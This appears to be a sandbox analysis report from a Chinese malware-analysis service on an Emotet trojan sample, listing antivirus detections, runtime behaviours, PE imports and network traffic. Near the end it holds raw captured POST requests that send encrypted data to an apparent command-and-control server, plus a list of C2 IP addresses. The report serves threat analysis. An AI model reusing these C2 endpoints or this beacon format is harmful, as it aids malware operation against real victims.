SmartHawk

6.6

高危

50 个模型检测该样本为恶意！

重新分析

下载样本

19816bbe6891e29b2223ffc6e9dd7382e1801da3fb45a7df124b113b1b3130ae

c205da428bd37957b532e40af7be2232.exe

分析耗时

94s

最近分析

文件大小

617.5KB

静态报毒动态报毒 ATTRIBUTE BANKERX CKGENERIC CLASSIC CONFUSERBG EJVW ELDORADO EMOTET GBYZS GENCIRC GENERICKDZ GENETIC GENKRYPTIK HFMY HIGH CONFIDENCE HIGHCONFIDENCE HRWFOZ KRYPTIK LADEU QVM41 R + TROJ R011C0DHF20 R347830 RXYUQ5GTSJI SCORE SMTHH UNCLASSIFIEDMALWARE@0 UNSAFE 更多

未检测暂无鹰眼引擎检测结果

查杀引擎	查杀结果	查杀时间	查杀版本
Baidu		20190318	1.0.0.2
Alibaba	Trojan:Win32/Emotet.0d85b62f	20190527	0.3.0.5
Tencent	Malware.Win32.Gencirc.10cde815	20200909	1.0.0.1
Kingsoft		20200909	2013.8.14.323
McAfee	Emotet-FRW!C205DA428BD3	20200909	6.0.6.653
Avast		20200910	18.4.3895.0
CrowdStrike		20190702	1.0

Queries for the computername (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619861612.562625 GetComputerNameA	computer_name: OSKAR-PC	success	1	0

Uses Windows APIs to generate a cryptographic key (4 个事件)

Time & API	Arguments	Status	Return
1619861601.546625 CryptGenKey	crypto_handle: 0x006a37f8 algorithm_identifier: 0x0000660e () provider_handle: 0x006a58b8 flags: 1 key: f°ÿ"qDÈé3{¯¶9qæ	success	1
1619861612.593625 CryptExportKey	crypto_handle: 0x006a37f8 crypto_export_handle: 0x006a3778 buffer: f¤_Ì#¤ÿoB¦±C¬UÜöT7$× ád¢ñ½pif£ká%(4X¦ä~¹02ar±£ì®_ª¼ÜC`8vv&°Áä+·ïãÖW#2AØt"¤.fóXMß blob_type: 1 flags: 64	success	1
1619861638.968625 CryptExportKey	crypto_handle: 0x006a37f8 crypto_export_handle: 0x006a3778 buffer: f¤Y¶/W_Ìíï²¥Å;¢>åFôÒG0÷4FQÇë8ÕÇ\|Ð5ßà§"Ã%ü;ù²áÍP:6Ûz2 àÒz¹ðÞGu{ýR,ycÂiÝ blob_type: 1 flags: 64	success	1
1619861663.359625 CryptExportKey	crypto_handle: 0x006a37f8 crypto_export_handle: 0x006a3778 buffer: f¤FKw$Æ=µÂ¾4Ã.vkSY¿i²ë¼®ÿãËOQ m@þ1vÄ,\|ð]½<´Aã#&ý$ÖJ3· *õ`û~éiÐÿÆ¥P=+ÏÁ¥ÿÒuÁ blob_type: 1 flags: 64	success	1

This executable has a PDB path (1 个事件)

pdb_path

c:\Users\Mr.Anderson\Desktop\2008\13.8.20\cgridlistctrlex-master\vs2003\Release\CGridListCtrlEx.pdb

Allocates read-write-execute memory (usually to unpack itself) (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619861600.937625 NtAllocateVirtualMemory	process_identifier: 3044 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0xffffffff allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x01ef0000	success	0	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 个事件)

Time & API	Arguments	Status	Return	Repeated
1619861601.327625 Process32NextW	process_name: mobsync.exe snapshot_handle: 0x000001ac process_identifier: 2452	success	1	0
1619861601.327625 Process32NextW	process_name: conhost.exe snapshot_handle: 0x000001ac process_identifier: 2740	success	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619861613.155625 GetAdaptersAddresses	flags: 0 family: 0	failed	111	0

Expresses interest in specific running processes (1 个事件)

process

c205da428bd37957b532e40af7be2232.exe

Reads the systems User Agent and subsequently performs requests (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619861612.859625 InternetOpenW	proxy_bypass: access_type: 0 proxy_name: flags: 0 user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)	success	13369348	0

Communicates with host for which no DNS query was performed (6 个事件)

host	113.108.239.196
host	172.217.24.14
host	207.144.103.227
host	213.176.36.147
host	94.76.247.61
host	203.208.40.98

Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)

Time & API	Arguments	Status
1619861615.718625 RegSetValueExA	key_handle: 0x000003c0 value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason	success
1619861615.718625 RegSetValueExA	key_handle: 0x000003c0 value: À%°´>× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime	success
1619861615.718625 RegSetValueExA	key_handle: 0x000003c0 value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision	success
1619861615.718625 RegSetValueExW	key_handle: 0x000003c0 value: 网络 2 regkey_r: WpadNetworkName reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName	success
1619861615.718625 RegSetValueExA	key_handle: 0x000003dc value: 1 regkey_r: WpadDecisionReason reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason	success
1619861615.718625 RegSetValueExA	key_handle: 0x000003dc value: À%°´>× regkey_r: WpadDecisionTime reg_type: 3 (REG_BINARY) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime	success
1619861615.734625 RegSetValueExA	key_handle: 0x000003dc value: 3 regkey_r: WpadDecision reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision	success
1619861615.734625 RegSetValueExW	key_handle: 0x000003bc value: {40112ABE-63B3-43C3-BE93-1440EE3AF106} regkey_r: WpadLastNetwork reg_type: 1 (REG_SZ) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork	success

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 个事件)

Bkav	W32.ConfuserBG.Trojan
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKDZ.69446
CAT-QuickHeal	Trojan.CKGENERIC
ALYac	Trojan.Agent.Emotet
Cylance	Unsafe
VIPRE	Trojan.Win32.Generic!BT
AegisLab	Trojan.Win32.Emotet.L!c
K7AntiVirus	Trojan ( 0056c7e01 )
BitDefender	Trojan.GenericKDZ.69446
K7GW	Trojan ( 0056c7e01 )
TrendMicro	TROJ_GEN.R011C0DHF20
Cyren	W32/Emotet.APQ.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Malware.Emotet-9371541-0
Kaspersky	HEUR:Trojan-Banker.Win32.Emotet.pef
Alibaba	Trojan:Win32/Emotet.0d85b62f
NANO-Antivirus	Trojan.Win32.Emotet.hrwfoz
ViRobot	Trojan.Win32.Emotet.632320
Tencent	Malware.Win32.Gencirc.10cde815
Ad-Aware	Trojan.GenericKDZ.69446
Comodo	.UnclassifiedMalware@0
F-Secure	Trojan.TR/AD.Emotet.ladeu
DrWeb	Trojan.Emotet.999
Zillya	Backdoor.Emotet.Win32.1001
Invincea	Mal/Generic-R + Troj/Emotet-CLA
FireEye	Trojan.GenericKDZ.69446
Sophos	Troj/Emotet-CLA
Jiangmin	Trojan.Generic.gbyzs
Avira	TR/AD.Emotet.ladeu
Antiy-AVL	Trojan/Win32.Kryptik
Microsoft	Trojan:Win32/Emotet.GGG!MTB
Arcabit	Trojan.Generic.D10F46
ZoneAlarm	HEUR:Trojan-Banker.Win32.Emotet.pef
GData	Trojan.GenericKDZ.69446
Cynet	Malicious (score: 85)
AhnLab-V3	Trojan/Win32.Emotet.R347830
McAfee	Emotet-FRW!C205DA428BD3
Malwarebytes	Trojan.Emotet
Panda	Trj/Genetic.gen
ESET-NOD32	a variant of Win32/Kryptik.HFMY
TrendMicro-HouseCall	TrojanSpy.Win32.EMOTET.SMTHH.hp
Rising	Trojan.Kryptik!1.CA82 (CLASSIC)
Yandex	Trojan.Kryptik!RXyuQ5GTsJI
TACHYON	Trojan/W32.Emotet.632320
Fortinet	W32/GenKryptik.EJVW!tr
AVG	Win32:BankerX-gen [Trj]
Qihoo-360	Generic/HEUR/QVM41.2.3AEF.Malware.Gen

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 个事件)

dead_host	172.217.24.14:443
dead_host	172.217.160.110:443
dead_host	94.76.247.61:8080
dead_host	207.144.103.227:80

暂无二进制图像该样本未生成二进制可视化图像

暂无运行截图该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手，可以帮您分析和解读恶意软件报告。请随时向我提问！

🔍 主要威胁分析

⚡ 行为特征

🛡️ 防护建议

🔧 技术手段

🎯 检测方法

🤖

Static Analysis
Strings

PE Compile Time

2020-08-14 04:29:28

Imports

Library KERNEL32.dll:

• 0x4620e8 RtlUnwind

• 0x4620ec TerminateProcess

• 0x4620f0 UnhandledExceptionFilter

• 0x4620f4 SetUnhandledExceptionFilter

• 0x4620f8 IsDebuggerPresent

• 0x4620fc GetTimeFormatA

• 0x462100 GetDateFormatA

• 0x462104 HeapFree

• 0x462108 VirtualProtect

• 0x46210c VirtualAlloc

• 0x462110 GetSystemInfo

• 0x462114 VirtualQuery

• 0x462118 HeapAlloc

• 0x46211c GetSystemTimeAsFileTime

• 0x462120 GetCommandLineA

• 0x462124 GetStartupInfoA

• 0x462128 HeapReAlloc

• 0x46212c HeapSize

• 0x462130 GetACP

• 0x462134 IsValidCodePage

• 0x462138 LCMapStringW

• 0x46213c GetTimeZoneInformation

• 0x462140 HeapCreate

• 0x462144 GetFileTime

• 0x462148 VirtualFree

• 0x46214c GetStdHandle

• 0x462150 LCMapStringA

• 0x462154 GetStringTypeA

• 0x462158 GetStringTypeW

• 0x46215c FreeEnvironmentStringsA

• 0x462160 GetEnvironmentStrings

• 0x462164 FreeEnvironmentStringsW

• 0x462168 GetEnvironmentStringsW

• 0x46216c SetHandleCount

• 0x462170 GetFileType

• 0x462174 QueryPerformanceCounter

• 0x462178 InitializeCriticalSectionAndSpinCount

• 0x46217c GetUserDefaultLCID

• 0x462180 EnumSystemLocalesA

• 0x462184 IsValidLocale

• 0x462188 GetConsoleCP

• 0x46218c GetConsoleMode

• 0x462190 GetLocaleInfoW

• 0x462194 SetStdHandle

• 0x462198 WriteConsoleA

• 0x46219c GetConsoleOutputCP

• 0x4621a0 WriteConsoleW

• 0x4621a4 CompareStringW

• 0x4621a8 SetEnvironmentVariableA

• 0x4621ac GetFileSizeEx

• 0x4621b0 GetFileAttributesA

• 0x4621b4 SetErrorMode

• 0x4621b8 FileTimeToLocalFileTime

• 0x4621bc GetModuleHandleW

• 0x4621c0 GetOEMCP

• 0x4621c4 GetCPInfo

• 0x4621c8 CreateFileA

• 0x4621cc GetFullPathNameA

• 0x4621d0 GetVolumeInformationA

• 0x4621d4 FindFirstFileA

• 0x4621d8 FindClose

• 0x4621dc GetCurrentProcess

• 0x4621e0 DuplicateHandle

• 0x4621e4 GetFileSize

• 0x4621e8 SetEndOfFile

• 0x4621ec UnlockFile

• 0x4621f0 LockFile

• 0x4621f4 FlushFileBuffers

• 0x4621f8 SetFilePointer

• 0x4621fc WriteFile

• 0x462200 ReadFile

• 0x462204 GetThreadLocale

• 0x462208 InterlockedIncrement

• 0x46220c TlsFree

• 0x462210 DeleteCriticalSection

• 0x462214 LocalReAlloc

• 0x462218 TlsSetValue

• 0x46221c TlsAlloc

• 0x462220 InitializeCriticalSection

• 0x462224 GlobalHandle

• 0x462228 GlobalReAlloc

• 0x46222c EnterCriticalSection

• 0x462230 TlsGetValue

• 0x462234 LeaveCriticalSection

• 0x462238 LocalAlloc

• 0x46223c GlobalFlags

• 0x462240 GetProfileIntA

• 0x462244 FileTimeToSystemTime

• 0x462248 InterlockedDecrement

• 0x46224c GetModuleFileNameW

• 0x462250 CopyFileA

• 0x462254 GlobalSize

• 0x462258 FormatMessageA

• 0x46225c LocalFree

• 0x462260 lstrlenW

• 0x462264 MulDiv

• 0x462268 GlobalGetAtomNameA

• 0x46226c GlobalFindAtomA

• 0x462270 lstrcmpW

• 0x462274 GetVersionExA

• 0x462278 GetTickCount

• 0x46227c GetPrivateProfileStringA

• 0x462280 WritePrivateProfileStringA

• 0x462284 FreeResource

• 0x462288 GetCurrentProcessId

• 0x46228c GlobalAddAtomA

• 0x462290 CloseHandle

• 0x462294 GlobalDeleteAtom

• 0x462298 GetCurrentThread

• 0x46229c GetCurrentThreadId

• 0x4622a0 ConvertDefaultLocale

• 0x4622a4 EnumResourceLanguagesA

• 0x4622a8 GetModuleFileNameA

• 0x4622ac GetLocaleInfoA

• 0x4622b0 CompareStringA

• 0x4622b4 InterlockedExchange

• 0x4622b8 lstrcmpA

• 0x4622bc Sleep

• 0x4622c0 GlobalAlloc

• 0x4622c4 GlobalLock

• 0x4622c8 GlobalUnlock

• 0x4622cc GlobalFree

• 0x4622d0 lstrcpynA

• 0x4622d4 FreeLibrary

• 0x4622d8 VerSetConditionMask

• 0x4622dc VerifyVersionInfoA

• 0x4622e0 MultiByteToWideChar

• 0x4622e4 lstrlenA

• 0x4622e8 RaiseException

• 0x4622ec DebugBreak

• 0x4622f0 WideCharToMultiByte

• 0x4622f4 LoadResource

• 0x4622f8 LockResource

• 0x4622fc SizeofResource

• 0x462300 FindResourceA

• 0x462304 GetModuleHandleA

• 0x462308 LoadLibraryA

• 0x46230c GetProcAddress

• 0x462310 GetLastError

• 0x462314 SetLastError

• 0x462318 ExitProcess

Library USER32.dll:

• 0x462380 LoadCursorA

• 0x462384 ReleaseCapture

• 0x462388 SetCapture

• 0x46238c SetRect

• 0x462390 IsRectEmpty

• 0x462394 WindowFromPoint

• 0x462398 DestroyMenu

• 0x46239c EndPaint

• 0x4623a0 BeginPaint

• 0x4623a4 GetWindowDC

• 0x4623a8 ClientToScreen

• 0x4623ac GrayStringA

• 0x4623b0 DrawTextExA

• 0x4623b4 TabbedTextOutA

• 0x4623b8 ShowWindow

• 0x4623bc MoveWindow

• 0x4623c0 SetWindowTextA

• 0x4623c4 IsDialogMessageA

• 0x4623c8 RegisterWindowMessageA

• 0x4623cc SendDlgItemMessageA

• 0x4623d0 WinHelpA

• 0x4623d4 IsChild

• 0x4623d8 GetCapture

• 0x4623dc GetClassLongA

• 0x4623e0 GetClassNameA

• 0x4623e4 GetPropA

• 0x4623e8 RemovePropA

• 0x4623ec SetFocus

• 0x4623f0 GetWindowTextLengthA

• 0x4623f4 GetWindowTextA

• 0x4623f8 GetForegroundWindow

• 0x4623fc GetTopWindow

• 0x462400 UnhookWindowsHookEx

• 0x462404 GetMessageTime

• 0x462408 TrackPopupMenu

• 0x46240c SetMenu

• 0x462410 GetScrollRange

• 0x462414 GetScrollPos

• 0x462418 SetForegroundWindow

• 0x46241c GetSubMenu

• 0x462420 GetMenuItemID

• 0x462424 CreateWindowExA

• 0x462428 GetClassInfoExA

• 0x46242c GetClassInfoA

• 0x462430 RegisterClassA

• 0x462434 AdjustWindowRectEx

• 0x462438 GetDlgCtrlID

• 0x46243c DefWindowProcA

• 0x462440 CallWindowProcA

• 0x462444 GetMenu

• 0x462448 SetWindowLongA

• 0x46244c IntersectRect

• 0x462450 SystemParametersInfoA

• 0x462454 GetWindowPlacement

• 0x462458 SetWindowContextHelpId

• 0x46245c MapDialogRect

• 0x462460 SetWindowPos

• 0x462464 RegisterClipboardFormatA

• 0x462468 SetActiveWindow

• 0x46246c CreateDialogIndirectParamA

• 0x462470 DestroyWindow

• 0x462474 IsWindow

• 0x462478 GetDlgItem

• 0x46247c GetNextDlgTabItem

• 0x462480 EndDialog

• 0x462484 GetWindowThreadProcessId

• 0x462488 GetWindowLongA

• 0x46248c GetSystemMetrics

• 0x462490 DrawIcon

• 0x462494 AppendMenuA

• 0x462498 SendMessageA

• 0x46249c GetLastActivePopup

• 0x4624a0 IsWindowEnabled

• 0x4624a4 MessageBoxA

• 0x4624a8 SetCursor

• 0x4624ac SetWindowsHookExA

• 0x4624b0 CallNextHookEx

• 0x4624b4 GetMessageA

• 0x4624b8 TranslateMessage

• 0x4624bc DispatchMessageA

• 0x4624c0 GetActiveWindow

• 0x4624c4 IsWindowVisible

• 0x4624c8 PeekMessageA

• 0x4624cc GetCursorPos

• 0x4624d0 ValidateRect

• 0x4624d4 UnregisterClassA

• 0x4624d8 MessageBeep

• 0x4624dc GetNextDlgGroupItem

• 0x4624e0 InvalidateRgn

• 0x4624e4 CopyAcceleratorTableA

• 0x4624e8 CharNextA

• 0x4624ec SetMenuItemBitmaps

• 0x4624f0 GetMenuCheckMarkDimensions

• 0x4624f4 PostThreadMessageA

• 0x4624f8 CharUpperA

• 0x4624fc GetSysColorBrush

• 0x462500 MapWindowPoints

• 0x462504 GetSystemMenu

• 0x462508 IsIconic

• 0x46250c GetClientRect

• 0x462510 EnableWindow

• 0x462514 LoadIconA

• 0x462518 GetFocus

• 0x46251c PostMessageA

• 0x462520 GetDC

• 0x462524 ReleaseDC

• 0x462528 UpdateWindow

• 0x46252c InvalidateRect

• 0x462530 GetWindow

• 0x462534 GetParent

• 0x462538 PtInRect

• 0x46253c InflateRect

• 0x462540 OffsetRect

• 0x462544 FillRect

• 0x462548 GetWindowRect

• 0x46254c GetSysColor

• 0x462550 GetDesktopWindow

• 0x462554 GetKeyState

• 0x462558 GetMessagePos

• 0x46255c SetClipboardData

• 0x462560 CloseClipboard

• 0x462564 EmptyClipboard

• 0x462568 DrawTextA

• 0x46256c CreatePopupMenu

• 0x462570 GetMenuItemCount

• 0x462574 ScreenToClient

• 0x462578 OpenClipboard

• 0x46257c CopyRect

• 0x462580 EqualRect

• 0x462584 DrawFocusRect

• 0x462588 PostQuitMessage

• 0x46258c CheckMenuItem

• 0x462590 EnableMenuItem

• 0x462594 GetMenuState

• 0x462598 ModifyMenuA

• 0x46259c LoadBitmapA

• 0x4625a0 SetPropA

Library GDI32.dll:

• 0x46203c ExtSelectClipRgn

• 0x462040 DeleteDC

• 0x462044 GetStockObject

• 0x462048 GetDeviceCaps

• 0x46204c CreatePen

• 0x462050 CreateSolidBrush

• 0x462054 CopyMetaFileA

• 0x462058 GetMapMode

• 0x46205c GetBkColor

• 0x462060 GetTextColor

• 0x462064 GetRgnBox

• 0x462068 ScaleWindowExtEx

• 0x46206c SetWindowExtEx

• 0x462070 ScaleViewportExtEx

• 0x462074 SetViewportExtEx

• 0x462078 OffsetViewportOrgEx

• 0x46207c SetViewportOrgEx

• 0x462080 SelectObject

• 0x462084 Escape

• 0x462088 ExtTextOutA

• 0x46208c TextOutA

• 0x462090 RectVisible

• 0x462094 GetTextExtentPoint32A

• 0x462098 GetWindowExtEx

• 0x46209c GetViewportExtEx

• 0x4620a0 MoveToEx

• 0x4620a4 LineTo

• 0x4620a8 SetMapMode

• 0x4620ac RestoreDC

• 0x4620b0 SaveDC

• 0x4620b4 SetBkColor

• 0x4620b8 SetTextColor

• 0x4620bc GetClipBox

• 0x4620c0 CreateRectRgnIndirect

• 0x4620c4 CreateBitmap

• 0x4620c8 DeleteObject

• 0x4620cc CreateFontIndirectA

• 0x4620d0 CreateCompatibleDC

• 0x4620d4 CreateCompatibleBitmap

• 0x4620d8 GetCurrentObject

• 0x4620dc GetObjectA

• 0x4620e0 PtVisible

Library COMDLG32.dll:

• 0x462034 GetFileTitleA

Library WINSPOOL.DRV:

• 0x4625a8 DocumentPropertiesA

• 0x4625ac ClosePrinter

• 0x4625b0 OpenPrinterA

Library ADVAPI32.dll:

• 0x462000 RegCreateKeyExA

• 0x462004 RegDeleteValueA

• 0x462008 RegSetValueExA

• 0x46200c RegCloseKey

• 0x462010 RegQueryValueA

• 0x462014 RegOpenKeyA

• 0x462018 RegEnumKeyA

• 0x46201c RegDeleteKeyA

• 0x462020 RegOpenKeyExA

• 0x462024 RegQueryValueExA

Library SHELL32.dll:

• 0x462364 ShellExecuteA

Library COMCTL32.dll:

• 0x46202c

Library SHLWAPI.dll:

• 0x46236c PathFindFileNameA

• 0x462370 PathStripToRootA

• 0x462374 PathIsUNCA

• 0x462378 PathFindExtensionA

Library oledlg.dll:

• 0x462614

Library ole32.dll:

• 0x4625b8 CreateStreamOnHGlobal

• 0x4625bc CreateILockBytesOnHGlobal

• 0x4625c0 StgCreateDocfileOnILockBytes

• 0x4625c4 StgOpenStorageOnILockBytes

• 0x4625c8 CoRegisterMessageFilter

• 0x4625cc CoRevokeClassObject

• 0x4625d0 CoGetClassObject

• 0x4625d4 RevokeDragDrop

• 0x4625d8 CoLockObjectExternal

• 0x4625dc RegisterDragDrop

• 0x4625e0 OleFlushClipboard

• 0x4625e4 OleIsCurrentClipboard

• 0x4625e8 OleDuplicateData

• 0x4625ec CoTaskMemAlloc

• 0x4625f0 ReleaseStgMedium

• 0x4625f4 CoTaskMemFree

• 0x4625f8 CLSIDFromString

• 0x4625fc CLSIDFromProgID

• 0x462600 OleInitialize

• 0x462604 CoFreeUnusedLibraries

• 0x462608 OleUninitialize

• 0x46260c DoDragDrop

Library OLEAUT32.dll:

• 0x462320 SystemTimeToVariantTime

• 0x462324 VarBstrFromDate

• 0x462328 SysFreeString

• 0x46232c VarUdateFromDate

• 0x462330 VarDateFromStr

• 0x462334 SysStringLen

• 0x462338 SysAllocStringLen

• 0x46233c VariantClear

• 0x462340 VariantChangeType

• 0x462344 VariantInit

• 0x462348 SysAllocStringByteLen

• 0x46234c OleCreateFontIndirect

• 0x462350 SafeArrayDestroy

• 0x462354 SysAllocString

• 0x462358 VariantCopy

• 0x46235c VariantTimeToSystemTime

Hosts

No hosts contacted.

DNS

Name	Response	Post-Analysis Lookup
dns.msftncsi.com	AAAA fd3e:4f5a:5b81::1	131.107.255.255
time.windows.com	A 20.189.79.72 CNAME time.microsoft.akadns.net
clients2.google.com	A 172.217.160.110 CNAME clients.l.google.com	172.217.160.78
dns.msftncsi.com	A 131.107.255.255	131.107.255.255
teredo.ipv6.microsoft.com		127.0.0.1

TCP

Source	Source Port	Destination	Destination Port
192.168.56.101	49184	213.176.36.147	8080

UDP

Source	Source Port	Destination	Destination Port
192.168.56.101	51808	114.114.114.114	53
192.168.56.101	51963	114.114.114.114	53
192.168.56.101	53210	114.114.114.114	53
192.168.56.101	55368	114.114.114.114	53
192.168.56.101	60123	114.114.114.114	53
192.168.56.101	60384	114.114.114.114	53
192.168.56.101	137	192.168.56.255	137
192.168.56.101	138	192.168.56.255	138
192.168.56.101	123	20.189.79.72 time.windows.com	123
192.168.56.101	49713	224.0.0.252	5355
192.168.56.101	51378	224.0.0.252	5355
192.168.56.101	53237	224.0.0.252	5355
192.168.56.101	53380	224.0.0.252	5355
192.168.56.101	56804	224.0.0.252	5355
192.168.56.101	58367	224.0.0.252	5355
192.168.56.101	61680	224.0.0.252	5355
192.168.56.101	62191	224.0.0.252	5355
192.168.56.101	62318	224.0.0.252	5355
192.168.56.101	63429	224.0.0.252	5355
192.168.56.101	65004	224.0.0.252	5355

HTTP & HTTPS Requests

URI	Data
http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/	POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1 Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ Content-Type: multipart/form-data; boundary=---------------------------544661808859543 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 213.176.36.147:8080 Content-Length: 4548 Connection: Keep-Alive Cache-Control: no-cache -----------------------------544661808859543 Content-Disposition: form-data; name="lwWTjyNlmoNoGd"; filename="sDwXwgJgpZcT" Content-Type: application/octet-stream \xc1\x13u\xd2\x0b\xff\x06\xa5\xc1\xcf+=P\x9e\xa5\x14\xc6\xff\xd0i\xe9\x96\x0c~\xfb`\xf5\x8d\xa0\xb73J\x1d\xd6$\xfd\x85&#\x83\xe3A\xb4<\xbd]\x17\x95\x04\xf0\|,\xc4\x8cv1\x92\xfe@m \x1c\x00QO\xcb\xe3\xff\x1a\xae\x0f\xbc\xeb\xb2i\xbf\x88YSk\x95v.\xc34\xbe\xc2\xb5=\xc6$w\x03KFO\x1e\xc3\xcd\xd6\x1c\xdbU\xdeL\xda\xdcl\xf3@\x82\x85d\xb9\x98W\x03\x9ad4\xf9\xbbo'\xd5\x9e\xb6\xc5\xdf\xd8k\xea\xef\xceP\xf5\xf0\x94X\xbf\xf1iY\x8a\xf7B\x00\xea\xd9VH20`\x14w\xd1\x7fy\x89\x19\x7f{\xe4\xc8\xfdh\xe7\xfe\x97\xa5\x06\xca\x1c1\xc7!\xc8A3z\xd4u) z\xd3\x9d)\xe3d]3VS\x82\xfb\xfe\xd0\xb3i\xe4\x97\xfa\x12\xe7\xc9\x0f\xfe\xeb\xd4\xc1"\xe0\x08\xb5so\x1eE[\xd1\x00\x15\xc7\x00M\xefX"\x82\x93\xa0\x87]\xc8\x98m\xac\xe8z>\x80\x97\x98 x\x7fI\x92ud\x0e,\xd0\xc6\xe4\x84 \x1aQ\\x80]j\xeb\xb5n\x9b\x11\xdby`U\x87K^mS\x92 1\x1e\x02=\x8e\x16\x90\xcb\xf7\x98n\xb4m\x1e\xab\x1d \x1bC\x1a\xad\x19\x07$\xc5\x11b\xaaC S\x90\x87BY\xc6\x1c\xcb0'e\xa2P\x13\x06$i}\xe4\x81\x12\xe5\xbe\x97\xde\x1dE5\xdc\xeeP\xee\x01XRF\xf0\xca\x0f\xd4r\x9d\x92\xcc\xc4\xfd\xfa\xad\xbd &\x10\x8c^\xa1\xf0\xd5\xc2\x97O\xdc\xfb5U\xef\xfd.\x03/1\xea\x0c\\xc7fBH\x17\x1d\xc0\x84\xf9\xa9\x83WS\x1c\xdf\xbf/\xf5\x8c\x84W\xfb\x8b/\x1e36\xad\xfb\\xf7G\xec\x07\xca\xf9\xfb\xafBO5\x18Ozb\xd1\xf7\xec\x86!\xf2)k\xb5C\xc0\x8d+,\x05\x05\xa9t\xa4{\xf4 -----------------------------544661808859543--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
http://213.176.36.147:8080/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/	POST /ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ HTTP/1.1 Referer: http://213.176.36.147/ir1ZY/2iL1Pr/hFYQeQTZOdzKsYPNH/BTXlpkVQdFpw/TnypTnGyIcEf2/td9DIJt1T/ Content-Type: multipart/form-data; boundary=---------------------------544661808859543 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 213.176.36.147:8080 Content-Length: 4548 Connection: Keep-Alive Cache-Control: no-cache
